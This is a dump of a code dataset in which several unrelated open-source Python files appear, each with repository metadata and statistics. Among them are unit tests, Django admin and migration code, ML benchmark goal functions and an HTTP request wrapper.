72acdacbf328dc9f2b6e507f1a78162999095cf5 | 96 | py | Python | envi/tests/test_radixtree.py | rnui2k/vivisect | b7b00f2d03defef28b4b8c912e3a8016e956c5f7 | [
"ECL-2.0",
"Apache-2.0"
] | 716 | 2015-01-01T14:41:11.000Z | 2022-03-28T06:51:50.000Z | envi/tests/test_radixtree.py | rnui2k/vivisect | b7b00f2d03defef28b4b8c912e3a8016e956c5f7 | [
"ECL-2.0",
"Apache-2.0"
] | 266 | 2015-01-01T15:07:27.000Z | 2022-03-30T15:19:26.000Z | envi/tests/test_radixtree.py | rnui2k/vivisect | b7b00f2d03defef28b4b8c912e3a8016e956c5f7 | [
"ECL-2.0",
"Apache-2.0"
] | 159 | 2015-01-01T16:19:44.000Z | 2022-03-21T21:55:34.000Z | import unittest
import envi.radixtree as e_tree
class RadixTest(unittest.TestCase):
pass
| 12 | 35 | 0.78125 | 13 | 96 | 5.692308 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 96 | 7 | 36 | 13.714286 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
f4359a1c6d22a4b88fff79ef1ed663c2ca5bf8f4 | 78 | py | Python | scripts/addons/animation_nodes/data_structures/splines/__init__.py | Tilapiatsu/blender-custom_conf | 05592fedf74e4b7075a6228b8448a5cda10f7753 | [
"MIT"
] | 2 | 2020-04-16T22:12:40.000Z | 2022-01-22T17:18:45.000Z | scripts/addons/animation_nodes/data_structures/splines/__init__.py | Tilapiatsu/blender-custom_conf | 05592fedf74e4b7075a6228b8448a5cda10f7753 | [
"MIT"
] | null | null | null | scripts/addons/animation_nodes/data_structures/splines/__init__.py | Tilapiatsu/blender-custom_conf | 05592fedf74e4b7075a6228b8448a5cda10f7753 | [
"MIT"
] | 2 | 2019-05-16T04:01:09.000Z | 2020-08-25T11:42:26.000Z | from . poly_spline import PolySpline
from . bezier_spline import BezierSpline
| 26 | 40 | 0.846154 | 10 | 78 | 6.4 | 0.7 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128205 | 78 | 2 | 41 | 39 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f43cec9f610922118d4ebe6b5b0d68cf63d699b1 | 287 | py | Python | lib/nas_201_api/__init__.py | EM-AutoML/AutoDL-Projects | 8ff416fe5d6cb1b310b885fe376e6f2790fbda14 | [
"MIT"
] | null | null | null | lib/nas_201_api/__init__.py | EM-AutoML/AutoDL-Projects | 8ff416fe5d6cb1b310b885fe376e6f2790fbda14 | [
"MIT"
] | null | null | null | lib/nas_201_api/__init__.py | EM-AutoML/AutoDL-Projects | 8ff416fe5d6cb1b310b885fe376e6f2790fbda14 | [
"MIT"
] | null | null | null | #####################################################
# Copyright (c) Xuanyi Dong [GitHub D-X-Y], 2019.08 #
#####################################################
from .api import NASBench201API
from .api import ArchResults, ResultsCount
NAS_BENCH_201_API_VERSION="v1.1" # [2020.02.25]
| 35.875 | 53 | 0.466899 | 29 | 287 | 4.482759 | 0.862069 | 0.107692 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083969 | 0.087108 | 287 | 7 | 54 | 41 | 0.412214 | 0.219512 | 0 | 0 | 0 | 0 | 0.035088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f468d07eee0b28b73efe9620a73217c2766b78a0 | 311 | py | Python | ex008.py | EwertonRosendo/PastaDeExercicios | 68d23194b87ce1c8405c70fcceb3378955815d7d | [
"MIT"
] | null | null | null | ex008.py | EwertonRosendo/PastaDeExercicios | 68d23194b87ce1c8405c70fcceb3378955815d7d | [
"MIT"
] | null | null | null | ex008.py | EwertonRosendo/PastaDeExercicios | 68d23194b87ce1c8405c70fcceb3378955815d7d | [
"MIT"
] | null | null | null | n = int(input("escreva um numero em metros que será convertido para centimetros e milimetros"))
print("{} metros equivale a {} centimetros e a {} milimetros".format(n, n*100, n*1000))
print("{} metros equivale a {}km, {}hm, {}dam, {}m , {}dm, {}cm, {}mm".format(n, n/1000, n/100, n/10, n, n*10, n*100, n*1000))
| 77.75 | 126 | 0.643087 | 55 | 311 | 3.636364 | 0.527273 | 0.03 | 0.075 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093985 | 0.144695 | 311 | 3 | 127 | 103.666667 | 0.657895 | 0 | 0 | 0 | 0 | 0.333333 | 0.617363 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
be4587c1e665659df70f6a7af6431cf67f55ccf9 | 3,069 | py | Python | tests/integration/cli_guess_test.py | ocefpaf/trailscraper | 1db91df5738f19d022760eda08ef310c73090b57 | [
"Apache-2.0"
] | 497 | 2018-01-08T15:36:05.000Z | 2022-03-30T14:11:54.000Z | tests/integration/cli_guess_test.py | ocefpaf/trailscraper | 1db91df5738f19d022760eda08ef310c73090b57 | [
"Apache-2.0"
] | 97 | 2017-11-26T13:52:20.000Z | 2022-02-07T01:36:10.000Z | tests/integration/cli_guess_test.py | ocefpaf/trailscraper | 1db91df5738f19d022760eda08ef310c73090b57 | [
"Apache-2.0"
] | 26 | 2019-04-04T21:37:29.000Z | 2022-02-18T10:23:07.000Z | from click.testing import CliRunner
from trailscraper import cli
from trailscraper.iam import PolicyDocument, Statement, Action, parse_policy_document
def test_should_guess_all_matching_statements():
input_policy = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
),
Statement(
Effect="Allow",
Action=[
Action('sts', 'AssumeRole'),
],
Resource=[
"arn:aws:iam::111111111111:role/someRole"
]
)
]
)
expected_output = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'DescribeLaunchConfigurations'),
],
Resource=["*"]
),
Statement(
Effect="Allow",
Action=[
Action('autoscaling', 'CreateLaunchConfiguration'),
Action('autoscaling', 'DeleteLaunchConfiguration'),
],
Resource=["*"]
),
Statement(
Effect="Allow",
Action=[
Action('sts', 'AssumeRole'),
],
Resource=[
"arn:aws:iam::111111111111:role/someRole"
]
)
]
)
runner = CliRunner()
result = runner.invoke(cli.root_group, args=["guess"], input=input_policy.to_json())
assert result.exit_code == 0
assert parse_policy_document(result.output) == expected_output
def test_should_guess_only_specific_actions_and_fix_upper_lowercase():
input_policy = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('ec2', 'DetachVolume'),
],
Resource=["*"]
),
]
)
expected_output = PolicyDocument(
Version="2012-10-17",
Statement=[
Statement(
Effect="Allow",
Action=[
Action('ec2', 'DetachVolume'),
],
Resource=["*"]
),
Statement(
Effect="Allow",
Action=[
Action('ec2', 'AttachVolume'),
Action('ec2', 'DescribeVolumes'),
],
Resource=["*"]
),
]
)
runner = CliRunner()
result = runner.invoke(cli.root_group, args=["guess", "--only", "Attach", "--only", "describe"], input=input_policy.to_json())
assert result.exit_code == 0
assert parse_policy_document(result.output) == expected_output
| 29.228571 | 130 | 0.461388 | 211 | 3,069 | 6.549763 | 0.317536 | 0.086831 | 0.115774 | 0.150507 | 0.740955 | 0.740955 | 0.70767 | 0.70767 | 0.70767 | 0.70767 | 0 | 0.035048 | 0.423591 | 3,069 | 104 | 131 | 29.509615 | 0.746184 | 0 | 0 | 0.757895 | 0 | 0 | 0.143043 | 0.059954 | 0 | 0 | 0 | 0 | 0.042105 | 1 | 0.021053 | false | 0 | 0.031579 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
be4af15d1c11c92e7956accbe80fa829f9ceb684 | 60 | py | Python | catkin_ws/src/line_detector/include/line_detector/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 12 | 2016-04-14T12:21:46.000Z | 2021-06-18T07:51:40.000Z | catkin_ws/src/line_detector/include/line_detector/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 14 | 2017-03-03T23:33:05.000Z | 2018-04-03T18:07:53.000Z | catkin_ws/src/line_detector/include/line_detector/__init__.py | DiegoOrtegoP/Software | 4a07dd2dab29db910ca2e26848fa6b53b7ab00cd | [
"CC-BY-2.0"
] | 113 | 2016-05-03T06:11:42.000Z | 2019-06-01T14:37:38.000Z | from .line_detector1 import *
from .line_detector2 import *
| 20 | 29 | 0.8 | 8 | 60 | 5.75 | 0.625 | 0.347826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.133333 | 60 | 2 | 30 | 30 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
be4e0a10789c867829ca0032ce6cda224c991103 | 143 | py | Python | feed/admin.py | radekwilk/Sharing-images-app-Django-project | 08773a156344216f9aa62c1bdf23ff18b4ee3725 | [
"MIT"
] | null | null | null | feed/admin.py | radekwilk/Sharing-images-app-Django-project | 08773a156344216f9aa62c1bdf23ff18b4ee3725 | [
"MIT"
] | null | null | null | feed/admin.py | radekwilk/Sharing-images-app-Django-project | 08773a156344216f9aa62c1bdf23ff18b4ee3725 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Post
class PostAdmin(admin.ModelAdmin):
pass
admin.site.register(Post, PostAdmin)
| 14.3 | 36 | 0.776224 | 19 | 143 | 5.842105 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146853 | 143 | 9 | 37 | 15.888889 | 0.909836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
be8a81aadcc411c31f3a4d13bd4f0eaea4f22116 | 2,355 | py | Python | clients/python/tyckiting_client/ai/tests/test_base.py | CarstenWalther/space-tyckiting | 8398f080332c78c7f246289947fdda49558e0f12 | [
"MIT"
] | 1 | 2017-02-04T14:13:44.000Z | 2017-02-04T14:13:44.000Z | clients/python/tyckiting_client/ai/tests/test_base.py | CarstenWalther/space-tyckiting | 8398f080332c78c7f246289947fdda49558e0f12 | [
"MIT"
] | null | null | null | clients/python/tyckiting_client/ai/tests/test_base.py | CarstenWalther/space-tyckiting | 8398f080332c78c7f246289947fdda49558e0f12 | [
"MIT"
] | null | null | null | import unittest
import json
from tyckiting_client.ai import base
from tyckiting_client import messages
class BaseTest(unittest.TestCase):
def test_getEndangeredBots_bot_sees_but_is_dead(self):
data = json.loads('[{"event":"move","botId":5,"pos":{"x":2,"y":-4}},{"event":"hit","source":4,"botId":5}, \
{"event":"damaged","botId":5,"damage":1},{"event":"see","source":5,"botId":0,"pos":{"x":2,"y":-3}}, \
{"event":"die","botId":5}]')
events = list(map(lambda e: messages.Event(**e), data or []))
ai = base.BaseAi(messages.Config())
endangeredBots = ai.getEndangeredBots(events)
expectedEndangeredBots = set()
self.assertEqual(endangeredBots, expectedEndangeredBots)
def test_getEndangeredBots_bot_detected_but_is_dead(self):
data = json.loads('[{"event":"move","botId":5,"pos":{"y":12,"x":-10}}, \
{"event":"damaged","botId":5,"damage":1}, \
{"event":"radarEcho","pos":{"y":-1,"x":3}}, \
{"event":"radarEcho","pos":{"y":0,"x":6}}, \
{"event":"detected","botId":5}, \
{"event":"die","botId":5}]')
events = list(map(lambda e: messages.Event(**e), data or []))
ai = base.BaseAi(messages.Config())
endangeredBots = ai.getEndangeredBots(events)
expectedEndangeredBots = set()
self.assertEqual(endangeredBots, expectedEndangeredBots)
def test_addIfNotDead_bot_is_dead(self):
data = json.loads('[{"event":"move","botId":5,"pos":{"x":2,"y":-4}},{"event":"hit","source":4,"botId":5}, \
{"event":"damaged","botId":5,"damage":1},{"event":"see","source":5,"botId":0,"pos":{"x":2,"y":-3}}, \
{"event":"die","botId":5}]')
events = list(map(lambda e: messages.Event(**e), data or []))
endangeredBots = set()
ai = base.BaseAi(messages.Config())
ai.addIfNotDead(endangeredBots, 5, events)
expectedEndangeredBots = set()
self.assertEqual(endangeredBots, expectedEndangeredBots)
def test_addIfNotDead_bot_is_dead(self):
data = json.loads('[{"event":"move","botId":5,"pos":{"x":2,"y":-4}},{"event":"hit","source":4,"botId":5}, \
{"event":"damaged","botId":5,"damage":1},{"event":"see","source":5,"botId":0,"pos":{"x":2,"y":-3}}]')
events = list(map(lambda e: messages.Event(**e), data or []))
endangeredBots = set()
ai = base.BaseAi(messages.Config())
ai.addIfNotDead(endangeredBots, 5, events)
expectedEndangeredBots = set([5])
self.assertEqual(endangeredBots, expectedEndangeredBots) | 46.176471 | 109 | 0.653079 | 311 | 2,355 | 4.874598 | 0.189711 | 0.059367 | 0.019789 | 0.023747 | 0.808707 | 0.808707 | 0.808707 | 0.788918 | 0.788918 | 0.788918 | 0 | 0.023966 | 0.096391 | 2,355 | 51 | 110 | 46.176471 | 0.68844 | 0 | 0 | 0.688889 | 0 | 0.133333 | 0.166384 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 1 | 0.088889 | false | 0 | 0.088889 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bea1283b747e80a30a83d908022efe53ed89fc85 | 1,623 | py | Python | lib/spack/spack/test/config_values.py | rvinaybharadwaj/spack | 03790a4f3609f1bedb7dee947c8712b0ab1e3348 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2020-10-20T08:57:12.000Z | 2020-10-20T08:57:12.000Z | lib/spack/spack/test/config_values.py | rvinaybharadwaj/spack | 03790a4f3609f1bedb7dee947c8712b0ab1e3348 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null | lib/spack/spack/test/config_values.py | rvinaybharadwaj/spack | 03790a4f3609f1bedb7dee947c8712b0ab1e3348 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 1 | 2020-11-08T10:26:48.000Z | 2020-11-08T10:26:48.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import spack.spec
def test_set_install_hash_length(mock_packages, mutable_config, monkeypatch,
tmpdir):
# spack.store.layout caches initial config values, so we monkeypatch
mutable_config.set('config:install_hash_length', 5)
mutable_config.set('config:install_tree', {'root': str(tmpdir)})
monkeypatch.setattr(spack.store, 'store', spack.store._store())
spec = spack.spec.Spec('libelf').concretized()
prefix = spec.prefix
hash = prefix.rsplit('-')[-1]
assert len(hash) == 5
mutable_config.set('config:install_hash_length', 9)
monkeypatch.setattr(spack.store, 'store', spack.store._store())
spec = spack.spec.Spec('libelf').concretized()
prefix = spec.prefix
hash = prefix.rsplit('-')[-1]
assert len(hash) == 9
def test_set_install_hash_length_upper_case(mock_packages, mutable_config,
monkeypatch, tmpdir):
# spack.store.layout caches initial config values, so we monkeypatch
mutable_config.set('config:install_hash_length', 5)
mutable_config.set(
'config:install_tree',
{'root': str(tmpdir),
'projections': {'all': '{name}-{HASH}'}}
)
monkeypatch.setattr(spack.store, 'store', spack.store._store())
spec = spack.spec.Spec('libelf').concretized()
prefix = spec.prefix
hash = prefix.rsplit('-')[-1]
assert len(hash) == 5
| 33.8125 | 76 | 0.664818 | 199 | 1,623 | 5.271357 | 0.336683 | 0.076263 | 0.085796 | 0.104862 | 0.807436 | 0.807436 | 0.755958 | 0.71878 | 0.71878 | 0.71878 | 0 | 0.014672 | 0.202095 | 1,623 | 47 | 77 | 34.531915 | 0.795367 | 0.198398 | 0 | 0.551724 | 0 | 0 | 0.144513 | 0.060278 | 0 | 0 | 0 | 0 | 0.103448 | 1 | 0.068966 | false | 0 | 0.034483 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bec9463940c433383d3df20353175902f9a5df58 | 4,371 | py | Python | mlbench_core/evaluation/goals.py | c4dt/mlbench-core | 8a5cf6e00ff4535b2aea23b213241858a5ee5f00 | [
"Apache-2.0"
] | null | null | null | mlbench_core/evaluation/goals.py | c4dt/mlbench-core | 8a5cf6e00ff4535b2aea23b213241858a5ee5f00 | [
"Apache-2.0"
] | null | null | null | mlbench_core/evaluation/goals.py | c4dt/mlbench-core | 8a5cf6e00ff4535b2aea23b213241858a5ee5f00 | [
"Apache-2.0"
] | null | null | null | def _add_detailed_times(result, tracker):
compute_time = tracker.get_total_compute_time()
if compute_time:
result += ", Compute: {} seconds".format(compute_time)
communication_time = tracker.get_total_communication_time()
if communication_time:
result += ", Communication: {} seconds".format(communication_time)
return result
def time_to_accuracy_goal(threshold):
def _time_to_accuracy_goal(metric_name, value, tracker):
if metric_name != "val_global_Prec@1":
return None
if value >= threshold:
duration = tracker.get_total_train_time()
result = (
"{0:02d}% Top 1 Validation Accuracy reached in {1:.3f} "
"seconds".format(threshold, duration)
)
result = _add_detailed_times(result, tracker)
return result
return None
return _time_to_accuracy_goal
def task1_time_to_accuracy_goal():
""" Accuracy over Time target for benchmark task 1: Image classification
Target is 80% accuracy
Return:
func: time_time_to_accuracy_goal with threshold = 80
"""
return time_to_accuracy_goal(80)
def task1_time_to_accuracy_light_goal():
""" Accuracy over Time target for benchmark task 1: Image classification
(Light)
Light target is 70% accuracy
Return:
func: time_time_to_accuracy_goal with threshold = 70
"""
return time_to_accuracy_goal(70)
def task2_time_to_accuracy_goal():
"""Time to accuracy goal for benchmark task 2: Linear binary classifier
Target is an accuracy of 89%
Return:
func: time_time_to_accuracy_goal with threshold = 89
"""
return time_to_accuracy_goal(89)
def task2_time_to_accuracy_light_goal():
"""Time to perplexity goal for benchmark task 2: Linear binary classifier
Target is an accuracy of 80%
Return:
func: time_time_to_accuracy_goal with threshold = 80
"""
return time_to_accuracy_goal(80)
def task3_time_to_preplexity_goal(metric_name, value, tracker):
"""Time to perplexity goal for benchmark task 3: Language Modelling
Target is a perplexity of 50
Args:
metric_name(str): Name of the metric to test the value for,
only "val_Prec@1" is counted
value (float): Metric value to check
tracker (`obj`:mlbench_core.utils.tracker.Tracker): Tracker object
used for the current run
Return:
result (str) or `None` if target is not reached
"""
if metric_name != "val_global_Perplexity":
return None
if value <= 50:
duration = tracker.get_total_train_time()
result = "Validation perplexity of 50 reached in {0:.3f} seconds".format(
duration
)
result = _add_detailed_times(result, tracker)
return result
return None
def task3_time_to_preplexity_light_goal(metric_name, value, tracker):
"""Time to perplexity goal for benchmark task 3: Language Modelling
Target is a perplexity of 50
Args:
metric_name(str): Name of the metric to test the value for,
only "val_Prec@1" is counted
value (float): Metric value to check
tracker (`obj`:mlbench_core.utils.tracker.Tracker): Tracker object
used for the current run
Return:
result (str) or `None` if target is not reached
"""
if metric_name != "val_global_Perplexity":
return None
if value <= 100:
duration = tracker.get_total_train_time()
result = "Validation perplexity of 50 reached in {0:.3f} seconds".format(
duration
)
result = _add_detailed_times(result, tracker)
return result
return None
def task4_time_to_bleu_goal(threshold=24):
"""Time to BLEU-score goal for benchmark task 4: GNMT machine translation"""
def _time_to_bleu_goal(metric_name, value, tracker):
if metric_name != "val_global_BLEU-Score":
return None
if value >= threshold:
duration = tracker.get_total_train_time()
result = "Validation BLEU-Score of {0} reached in {1:.3f} seconds".format(
threshold, duration
)
result = _add_detailed_times(result, tracker)
return result
return None
return _time_to_bleu_goal
| 26.815951 | 86 | 0.658888 | 562 | 4,371 | 4.877224 | 0.16548 | 0.054725 | 0.081722 | 0.091937 | 0.832543 | 0.734768 | 0.734768 | 0.728931 | 0.725283 | 0.708865 | 0 | 0.021563 | 0.267902 | 4,371 | 162 | 87 | 26.981481 | 0.835 | 0.350949 | 0 | 0.476923 | 0 | 0 | 0.133081 | 0.023819 | 0 | 0 | 0 | 0 | 0 | 1 | 0.169231 | false | 0 | 0 | 0 | 0.461538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fe35cd3633359bc57342fe8713175b4b6658b151 | 967 | py | Python | zerver/migrations/0385_attachment_flags_cache.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | 4 | 2021-09-16T16:46:55.000Z | 2022-02-06T13:00:21.000Z | zerver/migrations/0385_attachment_flags_cache.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | null | null | null | zerver/migrations/0385_attachment_flags_cache.py | dumpmemory/zulip | 496273ddbc567330a0022699d6d6eb5c646e5da5 | [
"Apache-2.0"
] | 1 | 2022-01-15T08:36:09.000Z | 2022-01-15T08:36:09.000Z | # Generated by Django 3.2.12 on 2022-03-23 03:49
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("zerver", "0384_alter_realm_not_null"),
]
operations = [
migrations.AlterField(
model_name="archivedattachment",
name="is_realm_public",
field=models.BooleanField(default=False, null=True),
),
migrations.AlterField(
model_name="archivedattachment",
name="is_web_public",
field=models.BooleanField(default=False, null=True),
),
migrations.AlterField(
model_name="attachment",
name="is_realm_public",
field=models.BooleanField(default=False, null=True),
),
migrations.AlterField(
model_name="attachment",
name="is_web_public",
field=models.BooleanField(default=False, null=True),
),
]
| 28.441176 | 64 | 0.594623 | 94 | 967 | 5.946809 | 0.414894 | 0.143113 | 0.178891 | 0.207513 | 0.729875 | 0.729875 | 0.729875 | 0.613596 | 0.613596 | 0.613596 | 0 | 0.029369 | 0.29576 | 967 | 33 | 65 | 29.30303 | 0.791483 | 0.04757 | 0 | 0.740741 | 1 | 0 | 0.155604 | 0.027203 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037037 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fe816f458a497f67cbbfb5062e5998e2a40011d2 | 3,032 | py | Python | sparrow_cloud/restclient/requests_client.py | ArcturusMensk/sparrow_cloud | 0ae75716de23b97366c2e2ac6c08e9850291c95d | [
"MIT"
] | null | null | null | sparrow_cloud/restclient/requests_client.py | ArcturusMensk/sparrow_cloud | 0ae75716de23b97366c2e2ac6c08e9850291c95d | [
"MIT"
] | null | null | null | sparrow_cloud/restclient/requests_client.py | ArcturusMensk/sparrow_cloud | 0ae75716de23b97366c2e2ac6c08e9850291c95d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
requests 的封装, 返回的原生数据
"""
import requests
from requests.exceptions import ConnectTimeout, ConnectionError
from sparrow_cloud.registry.service_discovery import consul_service
def get(service_conf, api_path, timeout=5, retry_times=3, *args, **kwargs):
"""
service_conf: 服务配置
:param service_conf:
:param api_path:
:param args:
:param kwargs:
:return:
"""
error_message = None
for _ in range(int(retry_times)):
try:
url = _build_url(service_conf, api_path)
res = requests.get(url, timeout=timeout, *args, **kwargs)
return res
except (ConnectionError, ConnectTimeout)as ex:
error_message = ex.__str__()
raise Exception("requests_client Error, api_path:{}, message: {}".format(api_path, error_message))
def post(service_conf, api_path, timeout=5, retry_times=3, *args, **kwargs):
"""
service_conf: settings 里面配置的服务注册 key 值
:param service_conf:
:param api_path:
:param args:
:param kwargs:
:return:
"""
error_message = None
for _ in range(int(retry_times)):
try:
url = _build_url(service_conf, api_path)
res = requests.post(url, timeout=timeout, *args, **kwargs)
return res
except (ConnectionError, ConnectTimeout)as ex:
error_message = ex.__str__()
raise Exception("requests_client Error, api_path:{}, message: {}".format(api_path, error_message))
def put(service_conf, api_path, timeout=5, retry_times=3, *args, **kwargs):
"""
:param service_conf: settings 里面配置的服务注册 key 值
:param api_path:
:param timeout:
:param args:
:param kwargs:
:return:
"""
error_message = None
for _ in range(int(retry_times)):
try:
url = _build_url(service_conf, api_path)
res = requests.put(url, timeout=timeout, *args, **kwargs)
return res
except (ConnectionError, ConnectTimeout)as ex:
error_message = ex.__str__()
raise Exception("requests_client Error, api_path:{}, message: {}".format(api_path, error_message))
def delete(service_conf, api_path, timeout=5, retry_times=3, *args, **kwargs):
"""
:param service_conf: settings 里面配置的服务注册 key 值
:param api_path:
:param timeout:
:param args:
:param kwargs:
:return:
"""
error_message = None
for _ in range(int(retry_times)):
try:
url = _build_url(service_conf, api_path)
res = requests.delete(url, timeout=timeout, *args, **kwargs)
return res
except (ConnectionError, ConnectTimeout)as ex:
error_message = ex.__str__()
raise Exception("requests_client Error, api_path:{}, message: {}".format(api_path, error_message))
def _build_url(service_conf, api_path):
"""
:param service_conf:
:param api_path:
:return:
"""
servicer_addr = consul_service(service_conf)
return "http://{}{}".format(servicer_addr, api_path) | 30.019802 | 102 | 0.638852 | 363 | 3,032 | 5.060606 | 0.168044 | 0.087643 | 0.06859 | 0.088187 | 0.850844 | 0.850844 | 0.821448 | 0.810016 | 0.810016 | 0.810016 | 0 | 0.003922 | 0.243074 | 3,032 | 101 | 103 | 30.019802 | 0.796514 | 0.175132 | 0 | 0.695652 | 0 | 0 | 0.085444 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.065217 | 0 | 0.282609 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fea5540868f718ca381a21ee2a75f07d7c04de4c | 54,487 | py | Python | tests_eos/functions.py | arista-netdevops-community/network_tests_automation | feb216799e427cde82bd7594d2276e0e6ef5f9b1 | [
"Apache-2.0"
] | 4 | 2022-02-07T16:54:13.000Z | 2022-03-02T02:22:06.000Z | tests_eos/functions.py | arista-netdevops-community/network_tests_automation | feb216799e427cde82bd7594d2276e0e6ef5f9b1 | [
"Apache-2.0"
